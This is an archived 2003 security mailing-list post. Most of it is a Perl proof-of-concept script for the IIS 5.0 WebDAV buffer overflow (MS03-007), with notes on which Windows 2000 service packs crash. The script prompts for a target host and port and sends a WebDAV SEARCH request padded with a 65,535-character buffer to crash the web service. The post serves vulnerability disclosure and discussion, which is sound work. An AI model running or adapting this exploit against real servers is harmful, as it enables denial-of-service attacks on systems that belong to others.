NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vulndiscuss> 2003-q1

[VulnDiscuss] WebDav - IIS 5.0 - MS03-007

matrixinfowarfare.dk
Date: Mon Mar 24 2003 - 10:30:22 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

# Tested on :
# W2K SP3 + the fix -> IIS issues an error
# W2K SP3 -> IIS temporarily crashes
# W2K SP2 -> IIS temporarily crashes
# W2K SP1 -> IIS does not crash, but issues a message
# about an internal error
#
# W2K -> IIS does not crash, but issues a message about
# an internal error
#
# Microsoft Security Bulletin MS03-007
#
# DISCLAIMER:
# The information in this bulletin is provided "AS IS" without warranty of any
kind.
# In no event shall we be liable for any damages whatsoever including direct,
indirect,
# incidental, consequential, loss of business profits or special damages.
#
# Coded by Matrix - www.infowarfare.dk
#
# If you put a debugger on the Inetinfo process you can see the result,
# And sorry about the code could be much more nice, but fuck, it works =)
#
#!/usr/bin/perl -w
#

use strict;
use IO::Socket;
use LWP::Simple;

# Globals Go Here.
my $host; # Host being probed.
my $port; # Webserver port.
my $Buffer; # A x 65535
my $XMLShit; # XML Request

$Buffer = "A" x 65535;
$Host_Header = "Host: 127.0.0.1\r\nContent-type: text/xml\r\nContent-Length: 133
\r\n";
$XMLShit = "<?xml version=\"1.0\"?> \r\n<g:searchrequest
xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()
\r\n</g:sql>\r\n</g:searchrequest>\r\n";

# SUBROUTINES GO HERE.
&intro;
&scan;
&exit; # Play safe with this .

sub intro {
&host;

sleep 3;
};

# host subroutine.
sub host {
system('cls');
print "\n WebDAV OverFlow for IIS 5.0 by Matrix.";
print "\n http://www.infowarfare.dk";
print "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "\n Host : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\n Port : ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
}; # end host subroutine.

# scan subroutine.
sub scan {
print "\n\n";
print "\nIIS 5.0 WebDAV BufferOverflow attack - $host on port $port ...";
print "\n";
&connect;
};

# Connect subroutine.
sub connect {
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Could not connect to
$host \n";

$connection -> autoflush(1);
# It is here we put it all together and Flush the Buffer
print $connection "SEARCH /$Buffer HTTP/1.1\r\n$Host_Header\r\n$XMLShit\r\n";
close $connection;
}; # end connect subroutine.

# exit subroutine.
sub exit{
print "\n\n\n";
exit;
};

-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]